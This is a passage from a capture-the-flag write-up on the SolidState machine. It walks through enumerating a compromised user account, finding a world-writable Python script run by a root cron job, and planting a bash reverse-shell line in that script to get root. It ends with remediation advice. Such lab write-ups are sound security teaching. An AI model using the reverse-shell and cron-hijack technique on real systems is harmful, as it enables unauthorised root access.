connect to [10.10.14.50] from (UNKNOWN) [10.10.10.51] 59974
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ pwd
/home/mindy
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ls -al
total 28
drwxr-x--- 4 mindy mindy 4096 Sep 8 2017 .
drwxr-xr-x 4 root root 4096 Aug 22 2017 ..
-rw-r--r-- 1 root root 0 Aug 22 2017 .bash_history
-rw-r--r-- 1 root root 0 Aug 22 2017 .bash_logout
-rw-r--r-- 1 root root 338 Aug 22 2017 .bash_profile
-rw-r--r-- 1 root root 1001 Aug 22 2017 .bashrc
drwxr-x--- 2 mindy mindy 4096 Aug 22 2017 bin
-rw------- 1 root root 0 Aug 22 2017 .rhosts
-rw------- 1 root root 0 Aug 22 2017 .shosts
drw------- 2 root root 4096 Aug 22 2017 .ssh
-rw------- 1 mindy mindy 33 Sep 8 2017 user.txt
Awesome, looks like we can go ahead and grab the user flag.
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cat user.txt
w00tw00tgetr00t #get your own flag ;)
Privilege Escalation
Let’s use the Linux Smart Enumeration script to use some automation to take out some of the privesc enumeration legwork out of it. You can find the script on github (and it’s linked on a few previous posts) if you don’t have it. Let’s go ahead and serve it over SimpleHTTP from our kali box, then see if we can wget the file on the target system.
root@kali:~# cd /recon/linux-smart-enumeration/
root@kali:/recon/linux-smart-enumeration# python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
Then from the target system:
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ which wget
which wget
/usr/bin/wget
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ wget http://10.10.14.50:8080/lse.sh
wget http://10.10.14.50:8080/lse.sh
--2020-02-02 16:09:35-- http://10.10.14.50:8080/lse.sh
Connecting to 10.10.14.50:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 34316 (34K) [text/x-sh]
Saving to: ‘lse.sh’
0K .......... .......... .......... ... 100% 691K=0.05s
2020-02-02 16:09:35 (691 KB/s) - ‘lse.sh’ saved [34316/34316]
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ chmod +x lse.sh
chmod +x lse.sh
Now let’s give it a run:
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ./lse.sh
./lse.sh
---
If you know the current user password, write it here for better results: P@55W0rd1!2@
---
LSE Version: 1.16
User: mindy
User ID: 1001
Password: ******
Home: /home/mindy
Path: /usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
umask: 0022
Hostname: solidstate
Linux: 4.9.0-3-686-pae
Distribution: Debian GNU/Linux 9.0 (stretch)
Architecture: i686
==================================================================( users )=====
[i] usr000 Current user groups............................................. yes!
[*] usr010 Is current user in an administrative group?..................... nope
[*] usr020 Are there other users in an administrative groups?.............. nope
[*] usr030 Other users with shell.......................................... yes!
[i] usr040 Environment information......................................... skip
[i] usr050 Groups for other users.......................................... skip
[i] usr060 Other users..................................................... skip
[*] usr070 PATH variables defined inside /etc.............................. yes!
[!] usr080 Is '.' in a PATH variable defined inside /etc?.................. nope
===================================================================( sudo )=====
[!] sud000 Can we sudo without a password?................................. nope
[!] sud010 Can we list sudo commands without a password?................... nope
[!] sud020 Can we sudo with a password?.................................... nope
[!] sud030 Can we list sudo commands with a password?...................... nope
[*] sud040 Can we read /etc/sudoers?....................................... nope
[*] sud050 Do we know if any other users used sudo?........................ nope
============================================================( file system )=====
[*] fst000 Writable files outside user's home.............................. yes!
[*] fst010 Binaries with setuid bit........................................ yes!
[!] fst020 Uncommon setuid binaries........................................ nope
[!] fst030 Can we write to any setuid binary?.............................. nope
[*] fst040 Binaries with setgid bit........................................ skip
[!] fst050 Uncommon setgid binaries........................................ skip
[!] fst060 Can we write to any setgid binary?.............................. skip
[*] fst070 Can we read /root?.............................................. nope
[*] fst080 Can we read subdirectories under /home?......................... yes!
[*] fst090 SSH files in home directories................................... nope
[*] fst100 Useful binaries................................................. yes!
[*] fst110 Other interesting files in home directories..................... nope
[!] fst120 Are there any credentials in fstab/mtab?........................ nope
[*] fst130 Does 'mindy' have mail?......................................... nope
[!] fst140 Can we access other users mail?................................. nope
[*] fst150 Looking for GIT/SVN repositories................................ nope
[!] fst160 Can we write to critical files?................................. nope
[!] fst170 Can we write to critical directories?........................... nope
[!] fst180 Can we write to directories from PATH defined in /etc?.......... nope
[i] fst500 Files owned by user 'mindy'..................................... skip
[i] fst510 SSH files anywhere.............................................. skip
[i] fst520 Check hosts.equiv file and its contents......................... skip
[i] fst530 List NFS server shares.......................................... skip
[i] fst540 Dump fstab file................................................. skip
=================================================================( system )=====
[i] sys000 Who is logged in................................................ skip
[i] sys010 Last logged in users............................................ skip
[!] sys020 Does the /etc/passwd have hashes?............................... nope
[!] sys030 Can we read /etc/shadow file?................................... nope
[!] sys030 Can we read /etc/shadow- file?.................................. nope
[!] sys030 Can we read /etc/shadow~ file?.................................. nope
[!] sys030 Can we read /etc/master.passwd file?............................ nope
[*] sys040 Check for other superuser accounts.............................. nope
[*] sys050 Can root user log in via SSH?................................... yes!
[i] sys060 List available shells........................................... skip
[i] sys070 System umask in /etc/login.defs................................. skip
[i] sys080 System password policies in /etc/login.defs..................... skip
===============================================================( security )=====
[*] sec000 Is SELinux present?............................................. nope
[*] sec010 List files with capabilities.................................... yes!
[!] sec020 Can we write to a binary with caps?............................. nope
[!] sec030 Do we have all caps in any binary?.............................. nope
[*] sec040 Users with associated capabilities.............................. nope
[!] sec050 Does current user have capabilities?............................ skip
========================================================( recurrent tasks )=====
[*] ret000 User crontab.................................................... nope
[!] ret010 Cron tasks writable by user..................................... nope
[*] ret020 Cron jobs....................................................... yes!
[*] ret030 Can we read user crontabs....................................... nope
[*] ret040 Can we list other user cron tasks?.............................. nope
[*] ret050 Can we write to any paths present in cron jobs.................. yes!
[!] ret060 Can we write to executable paths present in cron jobs........... nope
[i] ret400 Cron files...................................................... skip
[*] ret500 User systemd timers............................................. nope
[!] ret510 Can we write in any system timer?............................... nope
[i] ret900 Systemd timers.................................................. skip
================================================================( network )=====
[*] net000 Services listening only on localhost............................ yes!
[!] net010 Can we sniff traffic with tcpdump?.............................. nope
[i] net500 NIC and IP information.......................................... skip
[i] net510 Routing table................................................... skip
[i] net520 ARP table....................................................... skip
[i] net530 Namerservers.................................................... skip
[i] net540 Systemd Nameservers............................................. skip
[i] net550 Listening TCP................................................... skip
[i] net560 Listening UDP................................................... skip
===============================================================( services )=====
[!] srv000 Can we write in service files?.................................. nope
[!] srv010 Can we write in binaries executed by services?.................. nope
[*] srv020 Files in /etc/init.d/ not belonging to root..................... nope
[*] srv030 Files in /etc/rc.d/init.d not belonging to root................. nope
[*] srv040 Upstart files not belonging to root............................. nope
[*] srv050 Files in /usr/local/etc/rc.d not belonging to root.............. nope
[i] srv400 Contents of /etc/inetd.conf..................................... skip
[i] srv410 Contents of /etc/xinetd.conf.................................... skip
[i] srv420 List /etc/xinetd.d if used...................................... skip
[i] srv430 List /etc/init.d/ permissions................................... skip
[i] srv440 List /etc/rc.d/init.d permissions............................... skip
[i] srv450 List /usr/local/etc/rc.d permissions............................ skip
[i] srv460 List /etc/init/ permissions..................................... skip
[!] srv500 Can we write in systemd service files?.......................... nope
[!] srv510 Can we write in binaries executed by systemd services?.......... nope
[*] srv520 Systemd files not belonging to root............................. nope
[i] srv900 Systemd config files permissions................................ skip
==============================================================( processes )=====
[!] pro000 Can we write in any process binary?............................. nope
[*] pro010 Processes running with root permissions......................... yes!
[i] pro500 Running processes............................................... skip
[i] pro510 Running process binaries and permissions........................ skip
===============================================================( software )=====
[!] sof000 Can we connect to MySQL with root/root credentials?............. nope
[!] sof010 Can we connect to MySQL as root without password?............... nope
[!] sof020 Can we connect to PostgreSQL template0 as postgres and no pass?. nope
[!] sof020 Can we connect to PostgreSQL template1 as postgres and no pass?. nope
[!] sof020 Can we connect to PostgreSQL template0 as psql and no pass?..... nope
[!] sof020 Can we connect to PostgreSQL template1 as psql and no pass?..... nope
[*] sof030 Installed apache modules........................................ yes!
[!] sof040 Found any .htpasswd files?...................................... nope
[i] sof500 Sudo version.................................................... skip
[i] sof510 MySQL version................................................... skip
[i] sof520 Postgres version................................................ skip
[i] sof530 Apache version.................................................. skip
=============================================================( containers )=====
[*] ctn000 Are we in a docker container?................................... nope
[*] ctn010 Is docker available?............................................ nope
[!] ctn020 Is the user a member of the 'docker' group?..................... nope
[*] ctn200 Are we in a lxc container?...................................... nope
[!] ctn210 Is the user a member of any lxc/lxd group?...................... nope
==================================( FINISHED )==================================
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$
So there’s a bit to unpack here; looks like cron jobs might run a script, but we have no visibility to jobs that are not mindy’s, and she does not appear to have any running. The script does mention that we can write to paths executed by cronjobs, so that could be interesting. However, we’d need to know what path we’re looking for. Let’s see what writeable and executable files exist outside of mindy’s home directory. A run of find / -type f -perm -2 2>/dev/null yields a lot of results with /proc which likely isn’t very helpful, so let’s filter those out and run it again:
find / -type f -perm -2 2>/dev/null | grep -v proc
/opt/tmp.py
/sys/fs/cgroup/memory/cgroup.event_control
Let’s check out tmp.py real quick, to see if there’s anything useful there.
${debian_chroot:+($debian_chroot)}mindy@solidstate:/$ ls -ltr /opt/tmp.py
ls -ltr /opt/tmp.py
-rwxrwxrwx 1 root root 105 Aug 22 2017 /opt/tmp.py
Looks like it’s executable, so that’s good. Looks like python is also on the server too, we can confirm with:
${debian_chroot:+($debian_chroot)}mindy@solidstate:/$ which python
which python
/usr/bin/python
${debian_chroot:+($debian_chroot)}mindy@solidstate:/$ python -V
python -V
Python 2.7.13
${debian_chroot:+($debian_chroot)}mindy@solidstate:/$
OK, so in theory, we should be able to write to and run this file; it looks like it’s owned by root, but if we used a reverse shell inside the python script, it would likely just give us the same user shell back, as it doesn’t seem to have a setuid bit set for privileged execution, and we don’t have sudo installed on the system.
Let’s check the file out further, first:
${debian_chroot:+($debian_chroot)}mindy@solidstate:/$ cat /opt/tmp.py
cat /opt/tmp.py
#!/usr/bin/env python
import os
import sys
try:
os.system('rm -r /tmp/* ')
except:
sys.exit()
Interesting, it looks like the script is removing everything from /tmp. This seems like something you would have run as a cron job, if you wanted to clean /tmp every so often; the script doesn’t seem to have a timer function itself. It is possible however, that it could be run ad-hoc. We can test this though, by creating a file in /tmp (as it’s world-writeable) and seeing if it get’s removed.
Let’s try this:
touch /tmp/cron_test.dat && ls -ltr /tmp && sleep 60 && ls -ltr /tmp
We may have to adjust the time to sleep to be longer than a minute, maybe 3,5, 30, or even an hour. Let’s see first however, if any cron jobs are running every minute:
touch /tmp/cron_test.dat && ls -ltr /tmp && sleep 60 && ls -ltr /tmp
total 0
-rw-r--r-- 1 mindy mindy 0 Feb 2 16:35 cron_test.dat
total 0
${debian_chroot:+($debian_chroot)}mindy@solidstate:/$
After a minute, the script wakes up from sleep, runs the directory listing again, and what do you know, no files in /tmp anymore!
gaining a root shell
OK, so now we know there’s a cron job running on the system every minute executing /opt/tmp.py. While we know the file is owned by root, we’re not 100% if the file is being executed by root (vs another account on the system running a cron job), but let’s go ahead and added a statement in the python file to spawn another reverse shell, and see. So let’s edit the python script to look like this:
#!/usr/bin/env python
import os
import sys
try:
os.system('rm -r /tmp/* ')
os.system('bash -c "bash -i >& /dev/tcp/10.10.14.50/1234 0>&1"')
except:
sys.exit()
OK, let’s start another listener locally on kali with nc -lvnp 1234 and see if the reverse shell catches:
root@kali:/writeups/HTB/solidstate/exploits# nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.50] from (UNKNOWN) [10.10.10.51] 55726
bash: cannot set terminal process group (5618): Inappropriate ioctl for device
bash: no job control in this shell
root@solidstate:~#
After a moment, looks like we got a root shell, awesome! So this confirms the cron job was indeed running as root.
We can go ahead and grab the root flag and call it a day.
root@solidstate:~# id && date && ls -ltr
id && date && ls -ltr
uid=0(root) gid=0(root) groups=0(root)
Sun Feb 2 16:55:19 EST 2020
total 4
-rw------- 1 root root 33 Aug 22 2017 root.txt
root@solidstate:~# cat root.txt
cat root.txt
{thisflagsminemeow}
Conclusion
Recommended Remediations
-
The James Remote Administration service credentials should be changed from their defaults to something more secure
-
The James Remote Administration service should be patched to mitigate known exploits for that version of the service
-
Passwords for users should be given out-of-band (not email, maybe in-person, or another medium), if possible. The system should also be configured to immediately prompt the user to change their password on first login.
-
File permissions and cron job permissions should be asessed and addressed as needed. a possible solution would be to restrict permissions on the file executed by the cron job; if it really needs to be ran as root, it is probably best to have a 700 chmod on the python script, that way there is no visiblity to what the file is doing, nor any editing capabilities to an outside user
Personal takeaways
- get more comfortable reading and understanding exploits. If there is some confusion on what the exploit is actually doing, I should take more time to understand what it’s trying to do and how it behaves, before jumping to trying to get the exploit to trigger
All for now; until next time.
~@initinfosec
Let me know what you think of this article on twitter @initinfosec or leave a comment below!